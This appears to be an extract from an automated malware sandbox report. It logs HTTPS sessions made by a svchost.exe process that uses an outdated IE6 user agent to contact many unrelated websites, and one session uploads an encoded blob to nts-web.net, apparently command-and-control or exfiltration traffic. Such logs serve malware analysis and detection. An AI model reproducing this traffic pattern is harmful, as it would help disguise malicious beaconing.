                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        127192.168.2.66134049.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1795OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        128192.168.2.66173083.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1796OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=99
                                                                                                                                                                                                                                                                        Content-Length: 48940
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:27 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2131INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2135INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                        Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2143INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                                        Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2151INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                                        Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2159INData Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b
                                                                                                                                                                                                                                                                        Data Ascii: ps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2168INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                                        Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-it
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2176INData Raw: 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 33 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 67 6f 5f 70 72 69 63 69 6e 67
                                                                                                                                                                                                                                                                        Data Ascii: form-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/go_pricing


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        129192.168.2.6618175.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1796OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1797INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:26 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1797INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1813INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1829INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1845INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        13192.168.2.650525104.21.48.207443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC160OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC161INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:14 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:18 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:18 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        Set-Cookie: django_language=en; expires=Sat, 09-Mar-2024 06:46:18 GMT; Max-Age=31536000; Path=/
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OoCNQtySLXGFA%2B4Wl3Zc%2F3qBJcB0Be5AsfO9TlTi1OU7HtGTmVZZM5334rcHmVuvmcCFKFpc%2Fwd8ML2hvlsiU5ZUhIkiVcataIgczXhnUQ2WhH2D0hkwtmKJT%2BXPp8M9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a817fe809b1c-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC162INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC162INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        130192.168.2.66148349.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1848OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                                        Content-Length: 4272
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1848OUTData Raw: 75 6d 55 66 34 45 52 4e 55 31 68 65 59 57 56 70 62 48 42 30 64 33 74 2f 67 6f 56 4f 68 50 50 39 78 7a 52 73 72 59 43 67 58 37 6d 33 35 41 2b 39 4e 79 66 38 39 52 4f 57 70 66 41 31 69 6e 4a 2b 49 41 4a 33 55 56 38 46 71 69 34 31 63 58 66 75 77 7a 30 38 42 52 63 48 62 67 6e 43 51 58 31 76 39 31 73 70 46 6b 75 59 50 39 4e 56 6c 78 58 55 32 56 6e 49 39 50 66 70 74 2f 43 65 56 6f 48 38 6f 56 66 50 70 63 30 33 68 41 66 4c 4e 50 68 52 53 67 56 31 4a 6b 4b 32 41 79 44 68 6f 66 2f 49 39 5a 66 59 4b 46 64 73 66 77 36 46 31 74 55 45 53 6c 31 48 4e 43 4d 66 44 64 37 62 66 2f 73 67 53 6c 55 6c 45 50 41 35 78 44 37 78 6f 4b 69 4f 2f 52 43 58 5a 2b 74 6b 59 4f 43 45 32 52 4d 30 55 4d 44 30 78 36 59 55 39 6d 2b 64 6c 41 38 6d 7a 50 33 72 63 52 4c 32 72 63 70 61 4b 4a 66
                                                                                                                                                                                                                                                                        Data Ascii: umUf4ERNU1heYWVpbHB0d3t/goVOhPP9xzRsrYCgX7m35A+9Nyf89ROWpfA1inJ+IAJ3UV8Fqi41cXfuwz08BRcHbgnCQX1v91spFkuYP9NVlxXU2VnI9Pfpt/CeVoH8oVfPpc03hAfLNPhRSgV1JkK2AyDhof/I9ZfYKFdsfw6F1tUESl1HNCMfDd7bf/sgSlUlEPA5xD7xoKiO/RCXZ+tkYOCE2RM0UMD0x6YU9m+dlA8mzP3rcRL2rcpaKJf


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        131192.168.2.661948104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1853OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                        Cookie: d55e479f054c94814cbc10d217aaa990=bbd2a9ecd1f16e6deb08a6c096c7155a
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1990INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:27 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:56:27 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PpzCw0Ps58lOHMXbsuXM6%2F6b4AY3axqDkz2hR9CRbOwm7vb%2BlB%2FYKMBSkDB45UTcTJhGUj5CFA32hlqd0BMSMDO38Zzw7L%2FMHGNe5iBKNmsephdGEm8CulR8fbrvz9xE4g8%2BazPj6VY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a866cdad6921-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
